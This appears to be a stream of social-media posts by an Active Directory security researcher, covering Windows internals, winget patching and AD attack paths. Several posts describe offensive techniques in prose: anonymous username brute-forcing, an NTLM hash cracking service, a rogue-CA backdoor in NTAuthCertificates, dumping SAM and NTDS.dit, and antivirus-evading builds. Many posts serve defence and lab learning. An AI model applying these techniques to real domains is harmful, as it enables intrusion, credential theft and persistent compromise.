This is why your NVidia driver download is 670MB: they silently fix a *ton* of problems in games, so customers are happy. It's the same in Windows - here's the system wide shim db from Windows 11 23H2 with workarounds for "After Dark 4.0" with flying toasters released in 1996.
Do you want to go from NTLM hash to plaintext password in an instant? I made a freely accessible service contains 8.7B hashes, no sign up required, free to use.
Stuck on a network with no credentials? No worry, you can anonymously bruteforce Active Directory controllers for usernames over LDAP Pings (cLDAP) using my new tool - with parallelization I get 10K usernames/sec
Don't lose trust! "The trust relationship between this workstation and the primary domain failed." Have this ever happened to you? I'll show you how to fix it, and (more interestingly) how it works behind the scenes 1/🧵
Did you know that you can mass upgrade a lot of Windows 10/11 3rd party software with a free tool from Microsoft? It's like Linux's "apt" or "yum" ... Patching some of your vulnerable software is now free and easy, as I'll show you here 1/5
Unbelievably cool Active Directory lab for you (and me!) to play with. Has parent/child domains, ADCS, different servers, lots of misconfigurations etc. You provision it with Vagrant and Ansible. The Game of Thrones naming is a bonus!
When the Linux kernel is about to run out of entropy, it could just check the current licensing terms for Microsoft products, as they are always changing in a random way. Problem solved, next please!
The paper details how requests for random numbers never fail in Windows, which is something the Linux kernel developers have never been able to successfully implement. Hopefully they can use this paper for ideas. 🤞
LAPSUS is threatening to release 1TB of stolen data from NVIDIA, which is the equivalent of the last three driver updates I downloaded for my graphics card
Using WSUS to patch your Domain Controllers? :-) That makes your WSUS server .... Tier 0! Anyway, here's a tool to pwn every machine that pulls updates from WSUS.
Today I did some dorking on
@shodanhq
, looking for Active Directory controllers exposed directly on the internet. Results after searching for "ldap GSS-SPNEGO" yielded a whopping 52K servers. Mind blowing!
The Active Directory group "Account Operators" is a bastard, and should be kept empty. Why? Because it undermines your *entire* delegation structure in the AD. Here are the details, and it shows why you should stay clear of this group 1/n
The "Backup Operators" group in your Active Directory can remote in to your Domain Controllers, and extract the ntds.dit file holding your entire AD along with hashes of all accounts.
Here's the rundown on how you exploit this ...
You should definitely not download the maybe-abandonware After Dark 4.0 ISO from the internet and install it on your Windows 11 PC. On the other hand, if you *do*, it will really mess up the app usage metrics that your computer ships to Microsoft.
Have you ever wondered where the SIDs for isolated Windows service come from? S-1-5-80-..... they're not in the registry, and not on the disk ... that's because they're *calculated* based on the service name ...
Do domain/DNS recon using Azure and AADInternals PowerShell module against any organization that uses Azure ... this is Microsoft (you get loooong of domains)
Fellow Active Directory infosec researchers here in Denmark have figured out how to cross domains in the same direction as a trust - yes, the opposite of what is normal 1/🧵
So I'm diving head first into Azure AD, and I think it's a f*cking can of worms. Most large orgs do a TWO WAY sync of their on prem AD with AAD (users, groups, passwords). The attack surface is just horrible.
Deploy GOAD (the wonderful vulnerable Active Directory experimental lab from Orange Cyberdefense) - a quick guide. You'll need a spare PC with at least 4 cores, 16GB RAM and 256GB SSD. Script included, so it's easy even if you're not Linux savvy! 1/🧵
Your Azure AD Connect server ... it's a Tier 0 asset. Why? Because the Azure AD account it contains can probably compromise your entire tenant. If you use inbound password sync, the AD account it uses can potentially cost you your AD too. 1/7
SMB auditing: if you want to find/audit SMB shares there's SMBeagle as an option. It doesn't look at content, just exposed files, but is a nifty addition to the arsenal
Cool LDAP utility for Red Teamers! Easy to do simple lookups and some modifications - it has great potential and I'm sure more features will come. I had a similar tool planned, but never found the time to do it - fortunately
@synzack21
did!
Do you have privileges? Sure you do, every Windows user has them. See them with "whoami /priv", and check out this GitHub repository for how to help yourself to even more rights (aka privesc!). It's a list of privileges and how to use them creatively.
You can now do a plaintext password lookup in the 8.7B password database. This is done by converting it to NT hash internally, then looking that up. Controversially the site stores that hash of any unmatched passwords, just like if you did a hash lookup.
FastSync is released!
It's my rsync alternative for Linux, because I needed to sync 100TB in several billion files that were also hardlinked together (and rsync was slow and kept failing)
Maybe useful for others ... maybe not. But here it is:
Then launch an elevated Windows Terminal, and get ready to patch some stuff. You simply type "winget upgrade" - this shows you all the stuff you have installed (not necessarily using winget - also manually!) which can be upgraded. 3/5
This is NOTEPAD.EXE on my Windws 11 machine that has SYSTEM.INI with comments about 16-bit support while it has multiple TABS open ... my mind is melting here. If you've ever configured the Novell Netware login on Windows 3.11 in the SYSTEM.INI file manually this is wild.
Microsoft Defender goes nuts over open source reverse proxy. Claims I'm under ransomware attack (active??). It's an executable on the D:\ drive, it's benign and it's not running. Sigh.
Not this **** again. AV blaming an open source tool to be virus or malware. Sigh! It's a tunneling tool, you why not just flag SSH too? Fortunately this is written in Go, so I'll show you how to do an obfuscated build of it, which has almost no AV detections at all 1/🧵
WHAT!?!? More than 30 downloads PER DAY. I had no clue this was popular - based on GitHub stars it's not.
Spend 3 days making an attack tool: 9K downloads, spend 3 years making a defensive tool: 5K downloads.
No wonder everyone gets hacked.
@MalwareTechBlog
No, but I did successfully nuke Emotet from a large international company when 2 other companies failed, then deployed our EDR software and prevented a ransomware attack 9 months later. The thanks was they cancelled our software because it was too "noisy" in their alert mailbox.
Congrats, you're local admin. Now sync the password using PowerShell - provide an AD account that has the power to "Reset Password" on the machine account. That's it, problem solved! If you're in the mood for some history, read on ... 6/🧵
Further, now any companies that paid ransoms and didn’t do required disclosures are just going to get burned now.
Strong argument for future incidents, we have proof it does not work. And SEC is out for CISO blood…
If you're a sysadmin, you might consider adding this into an automated flow. If you're only pushing Microsoft updates at the moment, this is way better than nothing! You can also deploy software with winget ... and it's open source. What's not to like? 5/5
If you feel like Active Directory is daunting, but you want to learn more, and not feel like a total idiot at the same time ... read this: ... it wins because it's written concisely and in an easy to consume language (from
@Nutritionist_AP
feed, thanks 👏)
Visited new customer the other day for a sales meeting. There was a couple of hours of waiting time, so I asked if it was OK to "look around their infrastructure?". It was, so I plugged in and enumerated 40% of their AD users in 3 minutes with my own tool.
(Re)introducing source -> target searches. Here I'm searching for accounts with passwords older than 5 years and asking adalanche if any of those has a path to one of the "Domain Admins" groups in this multi forest analysis. Code is on Github!
I know it's "just" a LEGO set, but for me it's a fond childhood memory of dreaming of going to space. I really loved building this one. Thanks
@LEGO_Group
for making stuff for us old kids.
A way to shoot yourself in the foot with Active Directory, is to forget to clean up exposed cPassword data in GPOs. Now adalanche detects this, and everyone that can access these passwords too. If you're doing pen tests or securing AD, this makes it very easy to find this.💪💪💪
Backdoor an AD: bring your own innocently named CA, place it in CN=NTAuthCertificates,CN=Public Key Services,CN=Services,CN=Configuration,DC=contoso,DC=local - you can now always bring your own cert and be anyone. RT for reach, quote with a novel alternative.
Even if you aren't coding Go, here's a good explainer on tokens in Windows. I went through the same for the userspace service in our EDR product, service ran as high-priv and launched low priv interactive user tray bar when it detected a user logging in.
You can harden your Active Directory against wrong owners and permissions on Computer objects, which is a typical scenario with devastating results if it's a Domain Controller object. I've written about this problem earlier here. 1/11
Find DCs with wrong object owners using adalanche, and see the impact it's having to your security. If you're doing multi forest analysis, you can get really interesting results, as it will expose forest-to-forest takeover scenarios (names anonymized to protect the innocent) 1/5
Dump remote Windows hashes from SAM/SECURITY - this dumper overcomes SYSTEM only access by simply using admin rights to modify DACL, reading SAM and then restoring DACL - also supports NTLM relaying
Active Directory sysadmins: Run these extensive but easy to use tests on your infrastructure to show the most obvious problems. You'll get a goldmine of results back ranging from technical to security issues. Here's how you do it ... 1/5
Danish Identity Authority MitID (which is replacing the old NemID system here in Denmark) forgets to renew their SSL certificate. Minor mistake, but still my trust with them drops from "lukewarm" to "is the backend running with duct tape"🤦♂️
Highly underrated GitHub repo from
@DebugPrivilege
here - if you do lowlevel-ish coding or just want to learn about Windows internal stuff, it's a real gold mine with knowledge that is reasonably easy to pick up. Can't believe it only has so few stars.
New offensive security tool: Hash Muncher. It dumps incoming NTLM authentication hashes from SMB/file share access. It's based on ultra cool research from
@Nettitude_Labs
, great work!
Hacker strategy evolved: pwn a corp box, raise small alert that could be nothing. Wait for SOC employee to log into compromised box. Let them investigate and leave. Meanwhile steal their credentials, and then pwn everything because they have local admin on all boxes.
Audit your LAPS setup with adalanche: search for (_pwnable=ReadLAPSPassword). You'll probably get way too many targets, so limit it to a random subset with (_random100<5) which return ~5% of the targets. This is a LDAP query, so wrap both in (&(query)(query)) as pictured.
Funny thing ... doing a website for hackers - yes, I'm looking at you that looked this up NTLM hash 634A8D63867B2E64855DED9537420986 on 🤣... so now we do proper escaping
If you have internet facing Windows machines, this is a good option to bring down attack surface a bit.
There is also the
@Crowd_Security
Windows agent which is an early alpha (for test systems!)
Or wait a bit for
@UK_Daniel_Card
to release his RDP guard.
Any Internet-facing Windows machines?
1. Go to
2. Pick your favorite evil country.
3. Select "IP Range" as format.
4. Copy the result to clipboard.
5. Run the script from
If you're running Windows 11, it's preloaded onto the system, so you can skip this part. On Windows 10, go to the Microsoft Store and search for "app installer". Here is my laptop which hasn't been powered on for quite a while - ironically it has a winget update available :-) 2/5
Oh, boy. The LDAP Ping. I thought I knew LDAP, and here's something I didn't know about. It's pseudo code, a fate worse than a bicycle accident. The rootDSE can be probed anonymously. Notice any problems? ;-)
If you're curious about how the backend for is holding up ... well, it's not exactly under pressure. If you spend your entire 1000 lookup quota in one go, you'll keep it busy for ~1 second
AzureAD let's users access resources based on the permissions they have. Unless they claim to be using Powershell, then you get some extra read-only permissions thrown in for free. Bonus: every application can claim to be Powershell by using its client ID ¯\_(ツ)_/¯
I will keep whining about the task manager being hosed in Windows 11 until someone from Microsoft fixes it. CPU usage @ 20% yet details show 96% idle. Current best option is asking
@SwiftOnSecurity
to help the mothership.
Yo, pentesters! What are the "Game Over" scenarios for an AD domain? Ran DCsync, issued certificate for other user, pwned a DC via GPO, reached user that is member of AD/DA/EA ... others? Trying to map out what nodes that are *final* goals of most attacks.
Of course you will not get everything upgraded on your system, but if you're like me you have a *lot* of freely available software on your system. Most of this will get upgraded ... now run "winget upgrade --all" if you feel confident nothing will break 4/5
Explore how hackers attack Active Directory by abusing common misconfigurations! I've made the Orange CyberDefense GOAD lab available as sample data for Adalanche, so you can visualize and look at real world attack paths in 5 minutes.
Android RCE+root via browser nets you $7.700,- at TianfuCup.
The same exploit will get you up to $500.000 at Zerodium.
You'd have to have pretty high morals combined with your technical skills to not just sell your exploit quietly.
GPO vulnerability analysis is now working as intended in adalanche. Here's a great example, labels removed to protect the innocent, but I'll explain below what's going on here 1/n
Find DCs with wrong object owners using adalanche, and see the impact it's having to your security. If you're doing multi forest analysis, you can get really interesting results, as it will expose forest-to-forest takeover scenarios (names anonymized to protect the innocent) 1/5
@SwiftOnSecurity
Adalanche is my AD analysis tool. It shows graphs that visualize attack paths and other access methods in AD and Windows systems. It will take you less than 5 minutes to get results.
If your SCCM server controls your AD controllers -> SCCM servers are Tier 0 ... and if the SQL server storing the SCCM DB contains push credentials for Tier 0 -> that makes the SQL server Tier 0 as well.
Attack paths are so much fun, but hard to lock down.
Taking a look at SCCM on this lazy Sunday evening? Of course you are, what else is there to do?! One of the things that's likely to draw your interest are just how all those user accounts are stored. Check out the SC_UserAccount table in the SQL DB.
Active Directory is just a bottomless pit of opportunities for configuration mistakes. Hello there, Foreign-Security-Principal with full access to the keys to the kingdom by endless PKI abuse. Maybe this should be a predefined search somehow.
"It's all fun an games until someone loses a username". LDAP Nom Nom v1.0.7 high performance anonymous username bruteforcer for Active Directory - now with evasive maneuvers.
Hackers love IT documentation! It saves them so much time when doing the recon phase. They're often found in text files, Word documents, Outlook and Sharepoint. Leave false documentation lying around, pointing to internal honeypots or canary tokens.
New upgrade to the deploy-goad script I made for Ubuntu. If you don't know GOAD, it's an excellent vulnerable Active Directory lab from Orange Cyberdefense. Super easy to deploy a lab to test out detection, attacks and see some typical problems.
PassTester is a PowerShell based script that allows you to dump NTDS.DIT and scan for weak passwords using in order to immediately locate the most predictable passwords.
First some basics: when you join a computer to an Active Directory, it gets a machine account in the AD. This is like a user account, but with objectClass value 'computer' (and others) and some userAccountControl flags indicating it to be a computer (0x1000). But ... 2/🧵
To fix it, you need admin access to the machine. There are multiple ways to do this 1) local admin account 2) unrotated LAPS account (unlikely) or 3) cached domain account which is local admin. 4) break into machine with your fav ISO and pwn local administrator account. 5/🧵
What's your favorite hashcat rules and wordlists for attacking NTLM dumps?
I do get fairly good results, but it's always more or less random experimentation at the last percentages I'm able to squeeze out.
So to sum it up: locally stored machine password and AD password must match. Resyncing them is possible and easy, but must be done on both ends at the same time for it to work. 12/🧵END
@Eric0Lawton
@kcolbin
@JacquelynGill
I did one project, to fix a door security system written in Turbo Pascal in 1992. Not all code was available, and different parts of code on random disks. I spent at least 2 months on that in total. Doors wouldn't have unlocked 1/1/2000 if I hadn't. This is just a tiny example.